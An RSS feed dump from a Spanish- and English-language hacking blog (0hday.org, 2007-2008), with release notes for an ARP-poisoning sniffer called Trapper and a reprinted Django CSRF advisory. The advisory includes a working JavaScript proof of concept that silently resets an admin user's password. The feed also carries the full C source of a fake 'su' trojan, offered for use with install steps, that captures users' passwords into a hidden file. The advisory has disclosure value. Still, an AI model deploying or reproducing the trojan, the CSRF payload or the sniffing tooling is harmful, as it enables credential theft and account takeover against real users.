http://www.0hday.org/ 0hday.org (c) 2007-2008 0hday.org Wed, 23 Jul 2008 00:58:00 -0700 http://www.textmotion.org http://www.0hday.org/blog/view/28/trapper-0-4-released http://www.0hday.org/blog/view/28/trapper-0-4-released Trapper 0.4 is ready and released, download it from:<br /><a href="http://nediam.com.mx/trapper"><span>http://nediam.com.mx/download.html</span></a><br />Changelog:<br />+ Enable/Disable promisc option added<br />+ Lenght of the packet option added<br />+ Time between ARP packets option added ( Poisoning time )<br />+ Debug option added<br />+ Gateway Detection<br />+ Automatic Network Detection<br />+ Firefox Cookie injector<br />+ New MSN Sniffing ( based of sessions )<br />+ VNC Sniffing<br />+ SIP Sniffing<br />+ TeamSpeak Sniffing<br />+ FTP RETR file stealing<br />+ Improves in Http Sniffing<br />+ Http Base64 support<br />+ Http Cpanel ports support<br />+ Http Multipart Post Support<br />+ Rewrite of SMTP sniffing<br />+ SMTP Snarfing ( attachments )<br />+ Some code clean ( working in all trapper rewrite )<br />- Bad http regex matching with trapper.conf values<br />- 2Wire check on poisoning loop fixed<br />- Trapper died attemping to write the saving file, now it just warns the user<br />- Couldn't sniff on 'lo' interface<br />- IMAP output sniffing fixed<br /><br />And report any bugs!<br /> crypkey@0hday.org (crypkey) Wed, 23 Jul 2008 00:58:00 -0700 http://www.0hday.org/blog/view/27/trapper-0-4-videos http://www.0hday.org/blog/view/27/trapper-0-4-videos Well we have some videos of 0.4 trapper in action..<br /><br />http://nediam.com.mx/trapper/videos/vncsniffing.ogg<br />http://nediam.com.mx/trapper/videos/cookieinjection.ogg<br /><br />Trapper 0.4 gonna be released someday this month <img src="http://www.0hday.org/media/emoticons/default/wink.png" width="16" height="16" /><br />Any comments are good.. cya<br />&amp;nbsp; crypkey@0hday.org (crypkey) Tue, 03 Jun 2008 00:58:00 -0700 http://www.0hday.org/blog/view/26/trapper-0-4-on-his-way http://www.0hday.org/blog/view/26/trapper-0-4-on-his-way Bueno pues para q no digan que ya no se esta desarrollando, pues si estamos trabajando ya sobre la 0.4 de trapper que incluira:<br /><br />Https Sniffing<br />MSN Sniffing basado en sessiones 100% stable ( sin uso de base de datos etc.. )<br />SIP Sniffing<br />Cisco Sniffing<br />Cookie injector ( Bastante interesante )<br /><br />Y esperamos tambien meter:<br /><br />VNC Sniffing<br />RTP Sniffing <img src="http://www.zonartm.org/foro/Smileys/default/wink.gif" alt="Wink" border="0" /><br /><br />Aqui solo les dejo una screenshot del nuevo msn sniffing y pues lo demas, solo esperen =)<br /><br />http://img502.imageshack.us/img502/5812/newmsnsniffingwc6.png<br /><br /> crypkey@0hday.org (crypkey) Tue, 08 Apr 2008 15:24:33 -0700 http://www.0hday.org/blog/view/25/trapper-0-3-4 http://www.0hday.org/blog/view/25/trapper-0-3-4 <p>New features:</p> <p>Fake Mac supported almost in every distro<br /> FTP and POP3 passwd in different files<br /> Host and path for HTTP sniffing<br /> Installer added<br /> Code cleanup<br /> Stats added</p> <p>Bugs fixed:</p> <p>POP3 bad handling of multiple logins<br /> Saving incorrectly irc private msgs<br /> Killing incorrectly APR attack<br /> Post in HTTP sniffing not detected correctly</p> Download: http://nediam.com.mx/trapper/download.html crypkey@0hday.org (crypkey) Fri, 08 Feb 2008 16:05:53 -0800 http://www.0hday.org/blog/view/24/trapper-0-3-3 http://www.0hday.org/blog/view/24/trapper-0-3-3 Small bug fixes: <br /> <br /> Sniffing after APR <br /> Bad cookie saving. <br /> <br /> Download: http://nediam.com.mx/trapper/trapper-0.3.3.tar.gz crypkey@0hday.org (crypkey) Wed, 16 Jan 2008 12:44:37 -0800 http://www.0hday.org/blog/view/23/trapper-0-3-2 http://www.0hday.org/blog/view/23/trapper-0-3-2 Cosas nuevas: - Verbose para IRC Sniffing - Dirección MAC falsa (00:11:22:33:44:55 o aleatoria) - Trapper.conf (para especificar parametros que se deseen sniffear via http, similar a la funcionalidad de Cain) - Especificar ports en trapper.conf - IRC chat sniffing Bugs arreglados: - Detección de la dirección IP local - HTTP sniffing double value - Install.pl, modulos faltantes - Mostrando cookies en blanco Download <a href="http://nediam.com.mx/trapper/trapper-0.3.2.tar.gz">Click HERE!</a> Any bugs report it to: <a href="http://zonartm.org/foro">RTM Forums</a> or at crypkey@0hday.org, nediam@0hday.org, nahual@0hday.org crypkey@0hday.org (crypkey) Thu, 10 Jan 2008 02:31:54 -0800 http://www.0hday.org/blog/view/22/trapper-0-3-1-released http://www.0hday.org/blog/view/22/trapper-0-3-1-released We are currently working on https sniffing and smb downgrade sniffing, probably next release will include them <img src="http://www.zonartm.org/foro/Smileys/default/wink.gif" alt="Wink" border="0" /> w00t. Improvements: Http Sniffing APR Features: Cookie sniffing -v msn and cookie option Bug Fixes: Bad parsing on http sniffing Download: <a href="http://nediam.com.mx/trapper/trapper-0.3.1.tar.gz">http://nediam.com.mx/trapper/trapper-0.3.1.tar.gz</a> crypkey@0hday.org (crypkey) Tue, 01 Jan 2008 03:32:55 -0800 http://www.0hday.org/blog/view/15/trapper-0-3-released http://www.0hday.org/blog/view/15/trapper-0-3-released Bug Fixes: - Install.pl - Http Sniffing - APR timing. - Some other crappy fixes Improvements: - MSN Sniffing - IRC Sniffing - Http Sniffing - APR attack Any comments or bug reports go to: www.zonartm.org/foro Download: <a href="http://www.0hday.org/wp-content/uploads/trapper-03tar.gz" title="Trapper 0.3">http://nediam.com.mx/trapper/trapper-0.3.tar.gz</a> <a href="http://www.0hday.org/wp-content/uploads/trapper-03tar.gz" title="Trapper 0.3 released"> </a> crypkey@0hday.org (crypkey) Wed, 12 Dec 2007 12:33:29 -0800 http://www.0hday.org/blog/view/14/django-0-96-vulnerability http://www.0hday.org/blog/view/14/django-0-96-vulnerability Les paso el reporte de un fallo en django: <code> </code>Author: J. Carlos Nieto. Date: Oct 21, 2007 There exists a security hole in the default django's admin panel. Background ========== Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design. Django has an automatic admin panel that allows a person with admin privileges to modify the database tables, it allows to change any user password too. See more at <a href="http://www.djangoproject.com/">http://www.djangoproject.com</a> Summary ======= django has, by default, no CSRF protection, this may allow an attacker to change any user password by tricking a victim with admin privileges into a special forged web page (even in a a totally different server) that sends a request to change the password of the user with id = n. The victim does not know that the form was sent. If the victim has admin privileges the exploit will succeed, otherwise nothing will happen. Severity ======== Mild. This problem exists only with the default installation and can be easily solved using a middleware found in here: <a href="http://www.djangoproject.com/documentation/csrf/">http://www.djangoproject.com/documentation/csrf/</a>. Proof of concept ================ window.onload = function() { var url = <a href="http://127.0.0.1:8000/admin/auth/user/1/password/">"http://127.0.0.1:8000/admin/auth/user/1/password/"</a>; var pass = "funky"; var param = { password1: pass, password2: pass }; var form = document.createElement('form'); form.action = url; form.method = 'post'; form.target = 'hidden'; form.style.display = 'none'; for (var i in param) { try { // ie var input = document.createElement(''); } catch(e) { // other browsers var input = document.createElement('input'); input.name = i; } input.setAttribute('value', param[i]); form.appendChild(input); } document.body.appendChild(form); form.submit(); } Solution ======== Use the django's CSRF protection in all your applications. Take a look at <a href="http://www.djangoproject.com/documentation/csrf/">http://www.djangoproject.com/documentation/csrf/</a>. Disclosure Timeline =================== 2007.10.18 - Vulnerability found 2007.10.18 - Vulnerability reported to vendor 2007.10.18 - Vendor response, among other things: ..."it's not a vulnerability unless you can somehow force the code into my browser"... 2007.10.21 - Advisory release License ======= Copyright 2007 J. Carlos Nieto The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. xiam@0hday.org (xiam) Wed, 24 Oct 2007 09:10:33 -0700 http://www.0hday.org/blog/view/13/se-libera-la-version-0-1-de-trapper http://www.0hday.org/blog/view/13/se-libera-la-version-0-1-de-trapper Trapper es un sniffer que aparte tiene la modalidad de lanzar ataques de ARP Poison. Está escrito en Perl. El desarrollo de Trapper fue inspirado en la funcionalidad de <a href="http://www.oxid.it/cain.html">Cain</a>, pero como éste sólo funciona en Windows, quisimos hacer un programa que funcionara en Linux/Unix. Lo pueden descargar de <a href="http://nediam.com.mx/trapper/trapper-0.1.tar.gz">aquí</a>. Para cualquier bug report, comentarios, dudas etc.. pueden usar el foro de <a href="http://zonartm.org/foro">RTM</a> crypkey@0hday.org (crypkey) Sat, 06 Oct 2007 18:20:46 -0700 http://www.0hday.org/blog/view/12/fakesu-c http://www.0hday.org/blog/view/12/fakesu-c Hace poco tuve la necesidad de poner un fakesu, y la verdad los que encontre y los scripts eran demaciado intrusivos y no tenian mucha opcion, esta es una version muuy rapida de fakesu donde hacemos locking (la mayoria solo toma el primer password) con archivos y guardamos todo en /var/tmp/, recuerden de hacer alias su=/var/tmp/.su o algo asi. Sin mas preambulo lo ponemos aqui, ya que la pagina se ve bastante muerta. <code class="prettyprint"> /* * fake-su.c * * fastly written by nahual * god all the fakesu sucked * * Bastante sencillo: * * gcc -O2 -o .su fake-su.c * mv .su /var/tmp/.su * echo "alias su=/var/tmp/.su" >> ~/.bash_profile * Y esperar ... * * El Nahual * * TODO: * Agregar la posibilidad de que nos mande el password en un paquete UDP para logeo remoto. * */</code> #include #include #include #define SU "/bin/su" #define PASSWD "/var/tmp/.passwd" #define LOCK "/var/tmp/.su.lock" extern char **environ; int main(int argc, char **argv) { char *pass; char *user; char *ruser; FILE *inFile; switch(argc) { case 1: user = "root"; break; case 2: if(!strncmp("-", argv[1], 1)) { user = "root"; } else { user = argv[1]; } break; case 3: user = argv[2]; break; } //Esta el lockfile ya le grabamos una vez, lo dejamos en paz if((inFile = fopen(LOCK, "r")) != NULL) { unlink(LOCK); argv[0] = SU; execve(argv[0], argv, environ); } //Okas ahora lo ponemos en el file pero como tenemos "delay" vamos a grabarlo y luego hacer execle al su real if((inFile = fopen(PASSWD, "a+")) == NULL) { execle(SU, SU, argv[1], argv[2], NULL, environ); //Si definido DEBUG hablamos .. si no .. calladitos nos vemos mas bonitos #ifdef DEBUG perror("open() on PASSWD file"); #endif } //Okas agarramos el password ya pass = getpass("Password: "); ruser = getenv("USER"); fprintf(inFile, "%s tried %s / %s\n", ruser, user, pass); fclose(inFile); inFile = fopen(LOCK, "w"); fclose(inFile); printf("su: Permission denied\nSorry\n"); return 0; } nahual@0hday.org (nahual) Thu, 06 Sep 2007 12:23:28 -0700 http://www.0hday.org/blog/view/11/windows-hashes-repository http://www.0hday.org/blog/view/11/windows-hashes-repository En conjunto con el staff de <a target="_blank" href="http://nediam.com.mx">nediam.com.mx</a>, se libera la versión 1.0 del sistema <strong>"Windows Hashes Repository"</strong>. El objetivo de este proyecto es crear un repositorio con los hashes de Windows (LM y NT) de los password más comúnmente utilizados. Ustedes pueden alimentar al sistema con sus propios passwords; pueden introducirlos ya sea en texto plano o en hashes LM (LANMAN) o NT. Para el caso de texto plano, el sistema automáticamente calculará y desplegará los hashes. Si es por hashes, el sistema buscará en el repositorio y si encuentra dicho hash, desplegará la información asociada, y si no entonces se enviará a una fila de espera donde se intentará crackearlo utilizando rainbow tables. La página del sistema es: <a target="_blank" class="con_linea" href="http://nediam.com.mx/winhashes/index.php">http://nediam.com.mx/winhashes/</a>. // Crypkey crypkey@0hday.org (crypkey) Tue, 31 Jul 2007 23:18:19 -0700 http://www.0hday.org/blog/view/10/nuevo-staff http://www.0hday.org/blog/view/10/nuevo-staff Tenemos nuevo staff! asi que las cosas deben moverse un poco mas, sobre todo en la parte de Windows ya que el staff que estaba por algunos NDA no puede publicar mucho de lo mismo, pero ya vamos! <br /> <br /> Este fin de semana tendremos mas posts y tendremos mas proyectos, uno de los cuales es el primer framework de explotacion mexicano, a ver como nos va! <br /> <br /> //Nahual nahual@0hday.org (nahual) Wed, 18 Jul 2007 19:14:04 -0700 http://www.0hday.org/blog/view/6/objetivos-generales-y-convenciones-del-libro http://www.0hday.org/blog/view/6/objetivos-generales-y-convenciones-del-libro En este pequeño capitulo veremos los objetivos generales asi como las convenciones del libro, aunque los objetivos queramos moderadamente claros dentro de la introduccion es importante que el lector los tenga muy claros para poder mantener una vision clara de lo que se busca en este libro El objetivo principal del libro es que el lector tenga el conocimiento de las tecnicas tanto basicas como avanzadas de intrusion para asi poder hacer uso debido de las mismas en correspondencia con la etica individual del usuario final. Otro objetivo es que el lector al final del libro tenga un framework de trabajo en donde pueda mantener un esquema completo de trabajo parecido a APenFra de Yaguarete Security. <!--more--> Dentro del libro veremos diferentes tipos de ejemplos, cuando se demuestre un codigo (que en general sera de python sin embargo podremos cambiar a C, perl, ensablador y lo requerido en cada capitulo) se vera de la siguietne manera: <pre><code> #!/usr/bin/env python #</code><code> </code><code>import sys import socket class banner:    def __init__(self):       self.hola = "hola mundo"    def run(self):       print self.hola if __name__ == "__main__":    h = banner()    h.run()  </code></pre> <pre>De la misma manera se veran ejemplos y movimientos de codigo. Buscamos una manera mas rapida y facil para mantener legible, comentarios son aceptados </pre> nahual@0hday.org (nahual) Mon, 29 Jan 2007 12:42:13 -0800 http://www.0hday.org/blog/view/3/introduccion-a-la-serie-de-la-qenciclopedia-pentesticaq http://www.0hday.org/blog/view/3/introduccion-a-la-serie-de-la-qenciclopedia-pentesticaq "Hack con 0hday.org" es un proyecto que nacio de la posibilidad de poder hacer un framework de explotacion basico mientras se aprendia, nacio como la idea de un libro, sin embargo se hara como un libro electronico cada capitulo o tema añadido a este sitio. <br /> <br /> En los ultimos años han nacido frameworks de explotacion que han hecho el hacking mas facil, metasploit, CANVAS, IMPACT, etc. han hecho que la explotacion sea algo rapido y seguro, sin embargo se han perdido las ganas de aprender como funcionan las cosas, ya no hay textos explorando tenicas y como poder generarlas, ya que dia a dia las tecnicas se vuelven mas complejas y mas interesantes. Sin un "background" minimo el lector se pierde de excelentes libros como "Shellcoder's Handbook", "Exploiting Software", etc. <br /> Esta serie (identificada como por la categoria de Enciclopedia Pentestica) nos adentrara en la posibilidad de aprender a <br /> hacer nuestro propio framework de explotacion aprendiendo cada tecnica necesaria para el hackeo, con ejemplos y con la posibilidad de expandirlo conforme hayan mas capitulos y mas tecnicas. <br /> <br /> Esperamos que con esta serie los consultores de libro abierto que solo ejecutan metasploit y si no funciona lo explota lo marcan como debil aprendan y den un buen nombre a la seguridad y el hackeo etico. <br /> <br /> //Nahual nahual@0hday.org (nahual) Sat, 13 Jan 2007 12:33:54 -0800